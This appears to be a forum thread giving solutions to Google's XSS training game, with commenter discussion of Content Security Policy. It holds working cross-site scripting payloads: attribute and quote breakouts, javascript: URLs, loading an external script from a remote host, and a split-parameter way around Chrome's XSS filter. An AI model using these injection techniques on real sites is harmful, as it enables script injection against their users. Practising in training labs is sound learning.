I'm posting because I find that whenever I can't solve some security puzzle, it usually means I didn't foresee an attack and I've been writing insecure code :( So hopefully people who get stumped can take a look at the solutions and determine if that's the case for them.
It'd be cool if someone wrote up explanations for each of these w/ links to relevant portions of Google's documentation.
I know you posted on pastebin with 'never' for a reason. But in case they ever shut down, here is the text:
# lvl 1
Enter `<script>alert('')</script>` into the search box.
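Why it works: the search term is presumably echoed into the results page without any escaping, something along these lines (a sketch, not the game's actual source; `response.write` and `query` are placeholder names):
// hypothetical server-side echo of the search term, with no HTML escaping
response.write("No results were found for <b>" + query + "</b>");
// query = "<script>alert('')</script>" lands in the page verbatim and executes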
# lvl 2
Use the `onclick` attribute of the font tag (the hint comes from the first post, which shows `<font>` might be allowed for the purpose of changing colors). Winning message:
<font color="red" onclick="alert('')">blah</font>
and then click "blah" after posting the message (or use onload, etc.).
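For context: a plain `<script>` payload doesn't help on this level, presumably because the posts are inserted with innerHTML, and script elements added that way never execute; event-handler attributes, on the other hand, do fire. A quick illustration (`container` is any element, just for the sake of the example):
// a <script> injected through innerHTML never runs
container.innerHTML = "<script>alert('')<\/script>";          // silent
// but an event-handler attribute fires as soon as the element is used
container.innerHTML = "<img src='x' onerror=\"alert('')\">";  // pops immediately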
# lvl 3
Modify the URL parameter so that you inject code into the `<img>` tag:
https://xss-game.appspot.com/level3/frame#1.jpg' onclick="alert('')" alt='a picture called 1
which will render as:
html += "<img src='/static/level3/cloud/1.jpg' onclick="alert('')" alt='a picture called 1.jpg'/>";
on line 17 of the HTML file. Now click on the picture.
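For context, the frame's script presumably builds that line by concatenating the raw fragment into the markup, roughly like this (element and variable names are assumptions, not the game's exact code):
// rough sketch of the tab-switching code; num comes straight from location.hash
var num = window.location.hash.substr(1);
var html = "";
html += "<img src='/static/level3/cloud" + num + ".jpg'/>";
document.getElementById('tabContent').innerHTML = html;
Since num is never escaped, the quote in the fragment closes the src attribute and the rest becomes new attributes on the img tag.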
# lvl 4
Use `3'); alert('` as the value for your timer.
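Why it works: the timer value presumably lands inside an inline onload handler, roughly like this (written here as string concatenation; the real page likely uses a server-side template):
// the value is dropped into startTimer('...') with no escaping
html += "<img src='/static/loading.gif' onload=\"startTimer('" + timer + "');\"/>";
// timer = 3'); alert('  turns the handler into:  startTimer('3'); alert('');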
# lvl 5
Notice that if you type `javascript:alert('')` into your browser's location bar, an alert will pop up. So we'll use this as the location the user is sent to from the signup page. Go to the URL:
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('')
and then click the `Next` link.
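Why it works: the signup page presumably copies the next parameter straight into the link's href without checking the scheme, roughly (a sketch, names assumed):
// the next parameter becomes the link target
html += "<a href='" + next + "'>Next >></a>";
// next = javascript:alert('') makes clicking the link run the script instead of navigating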
# lvl 6
The regex only matches lowercase "http(s)". So host this JS file at some URL, e.g. http://mysite.com/xss.js:
alert('');
and then go to the URL `https://xss-game.appspot.com/level6/frame#Http://mysite.com/xss.js`
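The filter is presumably something close to this case-sensitive check (a sketch, not the game's exact code):
// hypothetical gadget loader; the regex has no 'i' flag, so only lowercase matches
function includeGadget(url) {
  if (url.match(/^https?:\/\//)) {
    return; // http:// and https:// URLs are rejected
  }
  var scriptEl = document.createElement('script');
  scriptEl.src = url; // "Http://mysite.com/xss.js" slips through and gets executed
  document.head.appendChild(scriptEl);
}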
# Notes
In an actual attack you'd use onerror or onload everywhere instead of onclick.
Level 6: You can exclude the protocol entirely (eg: "//news.ycombinator.com")
This makes the browser use the current page's protocol: if your site is browsed over http, every request to //www.example.com goes over http, and if the page was fetched over https, resources starting with // are loaded over https. Likewise, if your site were reachable at xyz://mydomain.com, all resources starting with // would be fetched using the xyz:// protocol.
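For example, the level 6 payload from above works with no scheme at all:
https://xss-game.appspot.com/level6/frame#//mysite.com/xss.js
and xss.js is then fetched over whatever protocol the frame itself was loaded with.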
I tried 110 MB and it actually worked as well! I'm not sure what the real limit is.
You can store MASSIVE amounts of data in these things. It also seems to eventually break the URL display and revert to about:blank. It still retains protocol integrity though.
Instead of "onclick" for the <img> tags, you can bypass the required user interaction and be more brutal using "onerror" e.g. <img onerror="alert('hacked')" url="broken_url">.
I just used a protocol-relative URL in level 6: `#//xxx.ngrok.io/foo.js`. I thought it was hilarious that they didn't filter that out.
Here's a way to bypass that: point the FF dev tools solely at the iframe, then use the Scratchpad to run the alert. It will accept that and let you move past.
I spent 20 minutes thinking I had something horribly wrong until I read this comment.
Even percent-encoding it ends up just including the entire injection as the path (on Firefox 50.0). I worked around it for now by editing the element directly in Developer Tools.
If someone has trouble making the exploit work in Chrome: the developer tools replace all ' with " when you inspect the element. This misleads you into thinking the website encloses attributes in " ", whereas they are actually enclosed in ' '.
These challenges are very easy. Does anyone know of something harder? To my knowledge, it's not easy to find material to study/exploit to get better at XSS.
I'm quite surprised that these exploits aren't blocked at the browser level by default, with developers having to write code to explicitly enable the behavior if they need it.
For example, if browsers flatly refused to load code from an external URL unless the address was whitelisted in the page's HTTP response headers then you'd make level 6's exploit impossible without much of an impact on web development.
The CORS header Access-Control-Allow-Origin can be used to force a browser to work that way, but only if a site sets it. I'm suggesting we're at the point now where browsers should be secure by default, even if it breaks some old sites.
So I was trying to accomplish this in Firefox and couldn't get past level 3. Switched to Chrome and the exact same solution worked just fine. Firefox was URL encoding my single and double quotes so I couldn't break out of the string for the image (if that makes sense). Firefox 50 and Chrome 54.0.2840.98
Chrome's XSS filter can still be circumvented in quite a few instances. The easiest way I've seen is when the attacker controls at least two variables and can split the XSS across them in such a way that neither half appears malicious but when loaded into the page they create a malicious script.
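A toy sketch of that idea (the parameter names and the rendering are made up, not any specific site): suppose a page concatenates two query parameters into its markup,
html += "<p>" + a + " " + b + "</p>";
and the filter inspects each parameter on its own, looking for a complete tag carrying an event handler. Then
a = <img src='x
b = ' onerror='alert("")'>
each look harmless in isolation, but together they render as <img src='x' onerror='alert("")'>, which fires as soon as the broken image fails to load.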
This is possible with the Content Security Policy header, including automated reports from the browsers when things are blocked. It's hard to implement however since a whitelist of allowed domains can grow very, very large for the average site.
E.g. if your web app uses embedded Tweets, MixPanel, and Google Fonts:
var policy = cspByAPI(basePolicy, ['twitter', 'mixpanel', 'googleFonts' ]);
I.e., the package maintains an up-to-date list of the image, script, etc. sources for all those different embeds, so you only have to specify what your own code needs (that's the basePolicy).
It's for node, but you can easily port it to Elixir or Python or Ruby.
Policies for 16 common CSP embeds are included, please send a pull request to add more.
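For reference, the raw header behind that kind of policy looks roughly like this (the domains are illustrative, not a complete or verified whitelist):
Content-Security-Policy: default-src 'self'; script-src 'self' https://platform.twitter.com https://cdn.mxpnl.com; style-src 'self' https://fonts.googleapis.com; font-src https://fonts.gstatic.com; report-uri /csp-report
The report-uri directive is what produces the automated violation reports mentioned above.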
That's the point I'm questioning - I think browsers should block by default and only allow things that are specifically allowed by the CSP (or by CORS).
For better or worse technologists have largely decided that backwards compatibility trumps all unless absolutely necessary. This means ELS for security patches, only non-breaking changes to the web (which is how we ended up with 'use strict' in Javascript), and even if it is "more secure" if it could break some portion of people's websites it must not be done by default, but must be opted into.
I don't personally agree with the decisions - but I can understand why they are made. It's easier to say I'd personally choose to give devs the finger and tell them to fix their code than to actually give devs the finger and tell them to fix/update their code.
> I'm quite surprised that these exploits aren't blocked at the browser level... I'm suggesting we're at the point now where browsers should be secure by default, even if it breaks some old sites.
Some are. But in general, XSS (especially reflected XSS) is not possible to block exclusively at the browser level.
> For example, if browsers flatly refused to load code from an external URL unless the address was whitelisted in the page's HTTP response headers then you'd make level 6's exploit impossible without much of an impact on web development.
You would also break a LOT of sites with a requirement like that. Not to mention the millions of people who have a website but have no idea what an HTTP header even is...
It's pretty normal to include external scripts on a website (CDNs for dependencies, tracking like Google Analytics, etc.).
The mechanism next=javascript:alert('') with the colon, what is it called?
Are there examples of using anything other than javascript before the colon?
It was a great tutorial :)
Do you... realize it's actually a live webpage you're testing on? It's not like the server checks to see if you wrote exactly the right answer. It just checks to see if an alert is fired. If it didn't work, it's because you didn't do it right.
<script>alert()</script> most certainly works unless you have NoScript.
I realize it's JS, but I can see it's just dumbly parsing what I've typed as opposed to, e.g., overloading alert() (which can be done: http://stackoverflow.com/questions/1729501/javascript-overri...) and demonstrating/using best practices in the source code to prevent the JS I type from actually damaging the demo itself.
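For the record, the kind of interception that Stack Overflow link describes is a few lines, something like:
// wrap the native alert so injected payloads get logged instead of popping up
var nativeAlert = window.alert;
window.alert = function (message) {
  console.log('alert intercepted:', message);
  // nativeAlert.call(window, message); // uncomment to still show the dialog
};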
For something that's really interesting, search Pinterest for "reactjs", and see if you get the "Hack Pinterest" tile as your first result. That was fun to play with!
Thanks. I'll admit this is a field I'm completely unfamiliar with. (I was actually considering bug bounty hunting in the future, thanks for the wake up call.)
I actually noticed the ; was being removed and was very confused as to why, but forgot to mention that in my earlier comment.
Full disclosure: I didn't bother to learn why the ; is being split out. But I can hazard a guess: the Python web server treats it as a parameter separator.